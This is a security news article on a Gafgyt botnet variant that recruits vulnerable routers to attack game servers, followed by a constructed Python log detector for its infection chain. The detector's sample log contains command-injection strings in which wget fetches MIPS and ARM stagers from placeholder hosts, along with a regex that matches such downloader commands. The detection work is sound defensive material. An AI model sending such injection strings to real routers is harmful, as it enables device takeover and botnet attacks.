New Gafgyt Botnet Targets Game Servers


A new Gafgyt variant is using vulnerable IoT devices to target gaming servers worldwide. The new variant is capable of launching a variety of denial-of-service attacks against the Valve Source Engine, a video game engine developed by Valve Corp. Valve runs popular games such as Half-Life and Team Fortress 2. Other gaming servers have also been targeted by the botnet, such as those hosting Fortnite. Gafgyt uses remote code-execution vulnerabilities to gain access to routers and recruit them into botnets that attack gaming servers. This variant also competes against similar botnets, such as JenX, which is frequently sold on Instagram. Researchers found several fake Instagram profiles selling the source code for the botnet at varying prices. Researchers contacted Instagram and alerted them to the profiles.

Gafgyt was first uncovered in 2014. It has become infamous for launching large-scale distributed denial-of-service attacks. The newest Gafgyt variant targets two of the same small-office router remote-code-execution flaws as its predecessor, JenX, which was discovered in 2018. The two flaws are CVE-2017-17215 and CVE-2014-8361. The newest variant also targets another vulnerability, CVE-2017-18368, a remote command-injection bug on Zyxel P660HN wireless routers. The Zyxel P660HN-T1A has a command-injection vulnerability in the remote system-log forwarding function, which can be reached by an unauthenticated user. There are more than 32,000 Wi-Fi routers worldwide that are vulnerable to these three flaws.

The Gafgyt variant uses three scanners to attempt to exploit the known RCE flaws. Once a device is compromised, the botnet makes it download either an ARM7 or MIPS binary using wget, a command-line tool that fetches content from web servers. The malware then connects to a command-and-control server and reports the device's information, such as its IP address and CPU architecture. The infected device is then forced to perform five different types of DoS attacks. The Gafgyt variant can perform different types of DoS attacks simultaneously, depending on the commands received from the C2 server.
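The infection chain above (command injection on a router, followed by a wget download of an ARM or MIPS stager) leaves a recognisable trace in the router's or reverse proxy's HTTP access log: a shell separator followed by a downloader and a URL inside a request parameter. The following detector is an added, constructed example and is not code from the article or from any research team. The log lines, IP addresses, request paths and parameter names in it are invented for the illustration and are not the real endpoints of the CVEs named above.

```python
"""Flag Gafgyt-style stager downloads in router / web access logs.

Constructed example: the sample log, paths, parameter names and addresses
are placeholders, not real captures or real vulnerable endpoints.
"""
import re
from urllib.parse import unquote_plus

# Constructed Apache-combined-format lines. Two carry an injected download
# command (one MIPS, one ARM7 stager); the rest are benign, including a
# request whose path merely contains the word "wget".
SAMPLE_LOG = """\
203.0.113.7 - - [12/Nov/2019:10:01:02 +0000] "GET /status.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Nov/2019:10:01:03 +0000] "POST /cgi-bin/EXAMPLE_syslog_form HTTP/1.1" 200 88 "-" "-"
203.0.113.7 - - [12/Nov/2019:10:01:03 +0000] "GET /cgi-bin/EXAMPLE_syslog_form?remote_host=198.51.100.9%3Bwget+http%3A%2F%2F198.51.100.9%2Fbins%2Fgafgyt.mips+-O+%2Ftmp%2Fx HTTP/1.1" 200 88 "-" "-"
198.51.100.20 - - [12/Nov/2019:10:02:17 +0000] "POST /soap/EXAMPLE_upnp HTTP/1.1" 500 0 "-" "-"
198.51.100.20 - - [12/Nov/2019:10:02:18 +0000] "GET /soap/EXAMPLE_upnp?cmd=%60wget%20http%3A%2F%2F198.51.100.20%2Farm7%20-O%20%2Ftmp%2F.a%60 HTTP/1.1" 500 0 "-" "-"
192.0.2.44 - - [12/Nov/2019:10:05:00 +0000] "GET /docs/wget.html HTTP/1.1" 200 2048 "-" "curl/7.64.0"
"""

# Source address, timestamp, method, request target and status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A shell separator or command substitution, then a downloader, then a URL.
# The separator requirement is what keeps "/docs/wget.html" from matching.
STAGER_RE = re.compile(
    r'(?:[;|&`\n]|\$\()\s*(?P<tool>wget|curl|tftp)\b[^;|&`]*?'
    r'(?P<url>(?:https?|tftp)://[^\s;|&`\'"]+)',
    re.IGNORECASE,
)

# Substrings IoT stagers commonly carry in the payload filename (heuristic).
ARCH_HINTS = ("arm", "mips", "mpsl", "x86", "sh4", "ppc", "m68k", "spc")


def parse_line(line):
    """Split one access-log line into fields; decode the request target once."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Injection payloads normally arrive URL-encoded in the query string.
    rec["decoded"] = unquote_plus(rec["target"])
    return rec


def find_stager(decoded_target):
    """Return the downloader, payload URL and architecture hint, or None."""
    m = STAGER_RE.search(decoded_target)
    if not m:
        return None
    url = m.group("url")
    path = url.split("://", 1)[1].lower()
    arch = next((h for h in ARCH_HINTS if h in path), None)
    return {"tool": m.group("tool").lower(), "url": url, "arch_hint": arch}


def scan_log(text):
    """Run the stager check over every line and collect alerts."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stager = find_stager(rec["decoded"])
        if stager:
            alerts.append({
                "src": rec["src"],
                "ts": rec["ts"],
                "path": rec["decoded"].split("?", 1)[0],
                **stager,
            })
    return alerts


def egress_block_list(alerts):
    """Hosts the routers were told to fetch from: candidates for an egress block."""
    return {a["url"].split("://", 1)[1].split("/", 1)[0] for a in alerts}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["src"]} {a["path"]} -> {a["tool"]} {a["url"]} (arch: {a["arch_hint"]})')
    print("egress block candidates:", sorted(egress_block_list(found)))
```

Two design points. The detector requires a shell separator before the downloader, so ordinary requests that mention "wget" in a path or user agent do not fire; and it keys on the payload URL rather than on the exploit path, so the same rule covers all three CVEs and any new one that ends in the same wget step. Routers that cannot export logs at all are better handled at the network edge: most small-office routers have no reason to initiate outbound HTTP or TFTP downloads, so an egress rule that denies them is a cheap complement to patching.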

The Gafgyt variant shows the dangers of insecure IoT devices. The increase in IoT botnets sold on Instagram at a low price, combined with the presence of wireless routers across all industries, means that IoT devices are at increased risk of being recruited into botnets. Every industry must be aware of IoT security and take measures to prevent devices on its network from being compromised and degrading business continuity.